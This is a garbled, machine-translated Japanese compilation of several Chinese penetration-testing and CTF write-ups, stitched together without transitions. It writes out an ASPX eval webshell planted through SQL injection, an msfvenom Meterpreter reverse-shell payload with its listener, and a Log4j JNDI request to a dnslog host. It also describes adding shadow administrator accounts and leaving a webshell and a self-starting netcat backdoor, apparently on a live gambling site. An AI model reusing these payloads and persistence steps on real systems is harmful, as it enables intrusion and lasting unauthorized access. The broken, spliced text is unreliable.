.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
0x00はじめに
侵入プロジェクトが実施されたとき、顧客は1つのIPのみを提供しました。ルーキーとして、私は遠く離れて航海し始めました。
0x01情報収集
NMAPはポートをスキャンし、高ビットポートのスキャンに注意を払い、予期しない利益につながることがよくあります。
弱いパスワードはログインしようとします。
簡単な要約。
0x03脆弱性検出
バックグラウンドテストにログインし、両方のシステムにSQLインジェクションが存在することを発見しました。
ポート8000のクロッカスシステムにファイルをダウンロードする脆弱性も見つかりました。
ログのダウンロードであることが判明しました。クリックして、ページに絶対的なパスがあることを発見します。
わかりました!絶対パスを収集します。
現在のアイデアは次のとおりです。
SQLインジェクションと組み合わせた絶対的なパスの前提で、SQLMAPの-SQL -Shellを使用してトロイの木馬を書き込もうとします。
0x04脆弱性
この絶対的なパスを詳しく見てみましょう。それを見つめると奇跡的な効果があると聞いた。 (笑う)
どこかでWCMS4.0を見たと思います。
それは正しい。ポート12055で、バックグラウンドにログインします
バックグラウンドでSQLインジェクションを使用して、シェルを書き込むことができます。
SQLインジェクションポイントは、ほぼ検索場所にあります。
パケットをインターセプトし、post.txtとして保存します。 SQLMAPを使用して注入を開始します。
注入、DBA許可、および絶対パスがあります。シェルのワンストップの準備ができました。
0x05 webshell
トロイの木馬にaspxの書き込みを開始します。
「%@ページ言語='javascript'%eval(request.item ['pass']);% 'into outfile' c: //プログラムファイル(x86)//cms server //wcms4.0 //x.aspx '
問題ありません、訪問してください。
ニース!
包丁の接続。
0x06制御サーバー
最初にこのサーバーに関する情報を収集します
サーバーはイントラネットで実行され、ここではMSFホースを使用してシェルをバウンスして転送することを選択します。
外部ネットワークにメタプロイトを構築する方法について。推奨記事:
http://www.sqlsec.com/2018/03/cloud.html#more
MSF馬を生成します
MSFVENOM -P Windows/X64/MeterPreter/Reverse_tcp Lhost=xx.xx.xx.xx lport=2333 -f exe road.exxx.xx.xx.xxはパブリックネットワークサーバーです
2333はパブリックネットワークポートです
生成されたMSF馬を中国の包丁を通してブロイラーにアップロードします。
外部ネットワーク上のMetaSploitは、監視の構成を開始します
Exploit/Multi/ハンドルを使用します
ペイロードを設定します
Windows/x64/meterpreter/reverse_tcp
LHOST 127.0.0.1を設定します
走る
いくつかのメータープレターコマンドを単純に実行します
GetUID電流権限
システムを取得して権利を引き上げます
getgui -uを実行します
Addy ServerIdentity 
ユーザーリストをもう一度表示します。返されたユーザーリストデータには、バイパス認証によって作成された追加の新しいユーザーがあります。
アクセスhttp://IP:8848/NACOSは新しいユーザーでログインします。
3を見つけました。分解して質問のソースコードを取得します。MetaCharset='utf-8'?php //hintはhint.pherror_reporting(1)にあります。
プロンプトファイルはnullです
/?file=php: //filter/convert.iconv.utf-16/resource=index.php
:010一般的なバックアップファイルまたはロボットがあるかどうかを最初に確認しましょう。
ソースコードをダウンロードして、tcpdf v6.3.2を参照してください
QINTERNALへのフォローアップ
はhttp://LocalHost:8082/``招待状にアクセスします
その後、Google検索「CTF」TCPDF招待状を検索します
INVITE:-3.3E9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
次に、イントラネットのSSRFを呼び出します
元の質問の比較
Gopherがリリースされていることがわかります
postアクセス /ユーザー /リスト、XML形式のデータを返します
とても当然、私はxxeについて考えました。 WAFを追加し、ファイルを直接読み取ることを許可しませんでした。
その後、SSRFを構築します。
/jolokia /listによって返されるデータは長すぎるため、内部のいくつかの特別なシンボルはXMLドキュメント構造が同じエンティティ内で開始および終了する必要があると報告しています。
には、ファイルを読み書きできるMbeanがあります。
NOがある場合、返された画像は上記の写真です。いいえがある場合、返された画像は次の2つの状況です
Exp:
圧縮されたパッケージファイルのファイルを確認しないため、解凍されたディレクトリの交差点につながる可能性があります。ここで、スクリプトを介してそのようなzipを生成できます。
同時に、サーバー上の参照チェックもあります。
2番目の質問は、スクリプトのロードコンテンツを投稿する方法です。ここでの私のアプローチは、サービスワーカーを使用して /API /テンプレートにリクエストを変更することです。サービスワーカーはブラウザサイドエージェントと同等であることがわかっているため、自然に投稿することができます。次に、最終的なソリューションが明らかになります。
1バケットバケット + 2 OSSリソース + 1 ECSリソースCF Alibabaコンソール
の管理者の権利を取得したことを意味します。
ポートクエリ
80はメインページ8182です。
カタログのトラバーサル
多くの機能はありませんし、使用するものは何もありません
MSSQL、DBA許可、Direct –OS-Shell
ここでの最初のマシンはネットワークを離れず、エコーしませんでした。私はあきらめました。いくつかのサイトを検索した後、私はついにリリースされてエコーされたウェブサイトを見つけました(リリースされている限り簡単に解決できました)。
情報を確認し、タスクリストを確認してください
現在、それはデータベースの許可です。私は当局を増やそうとしましたが、それは直接切断され、ウェブサイトを開くことができませんでした。注意して使用し、十分な情報を収集し、十分なパッチ情報を収集する必要があります。
別のサイトが変更されました。ウェブサイトパスを見つけます
最初にウェブシェルを入手してください
Godzillaのサツマイモはシステムに昇格しています
CSプラグインのサツマイモも、権利を正常にアップグレードしました
ADDシャドウアカウント、管理者の権限を追加する
クライアント
MSF監視を可能にします
CS
これ、これ、これ、これ、私は真面目な人です、Twitterがこれらを私にプッシュした理由はわかりません。これを実行し、プロモーションリンクを開き、アプリをダウンロードする必要があります。
ブラウザはホームページの予備的な発見システムにアクセスします:Windows Middleware IIS7.5言語:ASPX
には多くのオープンポートがあります。その中には、いくつかのWebサービスがあります:80(現在のホームページ)、81、82、88、4700181:これはこのQipaiサイトのバックエンドです。 82:バックエンドでもあります。どんなシステムなのかわかりません。確認コード88/47001があります:アクセスに失敗しました
再び7kbscanを使用します。結局のところ、ここで収集された辞書は中国人によって一般的に使用されています
/m/はユーザー登録ページです。
/test.htmlは、WeChatを調整するための入り口です。役に立たない。被害者が携帯電話でチャットするように導くかもしれません。
北京の特定のオペレーターのIPサーバーを確認します。国内のサーバーにWebサイトを構築することは非常に大胆です。
情報並べ替え
検証コードなし、ユーザー名/パスワード用に管理者/管理者を書くだけで、パッケージをつかみます
ユーザー名には見積もりがあり、エラーを返すように直接リクエストを送信しました。予期しないことが起こっていない場合は、エラーインジェクションまたはブラインドノートが必要です。
このデータパケットをローカルQipai.txtに保存するための2つのグループを分離し、SQLMAPを使用してスキャンします。MSSQLデータベースであり、-DBMSパラメーターがデータベースタイプを指定して時間を節約することはすでに知られています。
パスワードは888999、弱いパスワード、永遠の神です!
ギャンブルに参加できない、この男は1日で2800を失いました
長い間バックグラウンドで検索した後、アップロードポイントが見つからなかったので、最初に置きました
は16のライブラリを使い果たしました。名前によれば、ryplatformmanagerdbライブラリには、管理者関連の情報が含まれている場合があります。
実行時計名
長い間検索した後、私は管理者のアカウントとパスワードを見つけました。
はDBA許可です。シェルを取得してみてください。SQLMAPを使用してMSSQLデータベースのパスを直接爆破するだけです
TASKLIST表示プロセス、ソフトを殺すふりをするべきではありません
ファイアウォールを閉じて、右はまだ上がっていません
実行後、しばらく待ちました。私は幸運でした。マシンはパッチを適用されず、当局は一度に成功裏に提起されました。私はシステムの権限を取得し、自分が望むことを何でも始めました。
ファイル管理を入力すると、以前の情報が収集されたときにtest.htmlファイルを見ることができます。
NETSTAT -ANOポートオープニングの状況をチェックしてください、3389が開かれていません
リモートデスクトップにアクセスできます
COBALTSTRIKE私はそれを操作するのにあまり熟練していないので、MetaSploiteを使用してCSを介してMSFによって生成された馬をアップロードする必要があり、MSFは監視を可能にします
MSF監視を有効にします
CSでアップロードされた馬を実行します
MSFシェルが正常に取得されました。
パスワードハッシュを見る、MSFの馬は32ビットで、システムは64ビットであるため、取得できません
PSプロセスを表示し、プロセスでシステムの許可を得て実行されている64ビットプログラムを見つけてから、プロセスを移行した後にハッシュを取得します
SUCCESSISSEESTISSESSEESTISE SUCTESSISTESTESTERTERIME LOGNETERITE DESKTOP
リバウンドシェル用の2つのバックドア、1つのウェブシェル、1つのセルフスタートNCを残してください
数日前、私はテストツールを書き、最初にテストするためにそれを取り出しました。
ワンクリックゲッシェル、非常に滑らかに見えます、ハハ。
しかし. Xiao Mingは髪を振って、物事が単純ではないことを発見しました。
包丁が接続されている場合、500のエラーが返されます。
FirefoxのHackbarを使用して確認しました。それには何の問題もないので、なぜ包丁をつなげることができないのですか?
行ごとの執筆が完了した後、アクセスするときに正常に実行できないことがわかりました。ここでスクリーンショットを撮るのを忘れました。
私があきらめようとしていたとき、私はまだ役に立たないダウンロードコマンドがあったことを思い出しました。
はマレーシアに成功しましたが、あまりにも早く幸せにならないでください。
Xiao Mingは再び髪を振って、物事がさらに難しいことを発見しました.
マレーシアはファイルのアップロードを操作して名前を変更するなどしますが、ファイルを編集できず、ファイルソースコードなどを表示できません。クリックして空白スペースを表示します。
そうなので、データベースに行き、見てみましょう。
DAMAを使用して、このファイルをルートディレクトリにアップロードしてからアクセスし、データベース構成情報を正常に取得します。
次に、構成情報を入力してデータベースを入力します。
この記事が書かれた夜遅くすでにありました。私はテーブルの上でインスタント麺の半分を食べたインスタント麺を見て、最後に2杯のスープを飲み、電話をオフにして寝ました.
を取得します
を分析して見つけます
次に、「オプション」をクリックし、「[詳細なオプション」を選択し、[プリフェッチ]位置を変更し、最後に[確認]をクリックします。得る;
PAYLOAD 1ファイルからロードすると、これについてもっと言う必要はありません。
Payload 2 [拡張生成]を選択します。
HTTPS:
Connections3:プロキシアドレスを構成します
Gateway:
3。コンピューターアプレットを開きます
アプレットを開きます
successiveしてキャプチャされました
。
figure1: functionmain(){java.perform(function(){varbytestring=java.use( 'com.android.okhttp.okio.bytestring'); java.use( 'java.util.arrays')=function(x、y){console.log( 'start .'); varresult=this。
Figure2: Get Flag:Flag {DE5_C0MPR355_M@Y_C0NFU53} 
FIGURE3
FIGURE4:ログインと購入フラグ
フラグ:フラグ{Y0U_H@v3 _@_ 107_0F_M0N3Y !}0xff。 s=[0x1e、0,7,0xce、0xf9,0x8c、0x88,0xa8,0x52,0x99,0x19,0x15,0x66,0x2e、0 Xaf、0xf6,0x43,0x2c、0xc9,0xca、0x66,0xaa、0x4c、0,0xd6,0xff、0x44,0x BD、0x72,0x65,8,0x85,0x12,0x7f、0x13,0x24,0xfc、0x24,0x33,0x23,0x97,0xb 2] s1=[0x78,108,0x66,0xa9,0x82,0xb5,0xbe、0xcb、0x64,0xa0,0x2f、0x21,0x50 、3,0x97,0xc7,0x7b、0x18,0xe4,0xfe、0x55,0x9c、0x7f、0x2d、0x1d、0xb2,0x9a、0x7d、0x90,0x45,0x56,0x6e、0xb2,0x21,0x46,0x2b、0x14,0xca、0x12,0x50,0x1 2,0xea、0xb2] print(len(s))flag='' foriinrange(len(s)):flag+=chr(s [i]^s1 [i])print(flag)または一般的に、この種の質問が1つずつチェックされるので、この種の質問を好みます。メインテキストに戻る:IDAロードファイル:
プログラムは「%36S」と言って実行を開始しますが、実際には42ビット、嘘つきを入力する必要があります。開始して、機能の束を見ると、それぞれが似ているように見えることがわかり、フラグがビットごとに検証され、フラグが関数に対応するかどうかを推測します。デバッグや他のものはまだかなり疲れています(フラグがまったくチェックされている方法がわからないことはわかりません)。怠zyになるために、ここでユニコーンを直接使用し、printfとscanfが開始関数で呼び出される場所にパッチを当て、次にscanfをフックしてフラグをメモリに入力できるようにします。
solrにはlog4jコンポーネントがあることを発見しました。
get /Solr/admin/cores?action=$ {jndi:ldap://1p9bvr.dnslog.cn} http/1.1
DNSLOGエコー
JNDIリバウンドシェル、VPSで開きます
PAYLOAD
sudoの権利のエスカレーション
Sudo Grc - Help 
Sudo Grc-Pty Whoami 
FIND FLAG
出力フラグ
を使用して共有に接続する
Get Falg02を取得すると、SMBが列挙されている別のプロンプトがあります。しかし、あなたはSPNが何であるか知っていますか?
RDPクラック
hashオフラインクラッキング、非常に速く、1.txtはハッシュ値です。
get zhangxia/mypass2 @@ 6、アカウントパスワードを使用してリモートでログインします
ESC1利用前提条件:
ドメインマネージャーからチケットを取得した後、ハッシュをエクスポートします
元リンク: https://zhuanlan.zhihu.com/p/581487685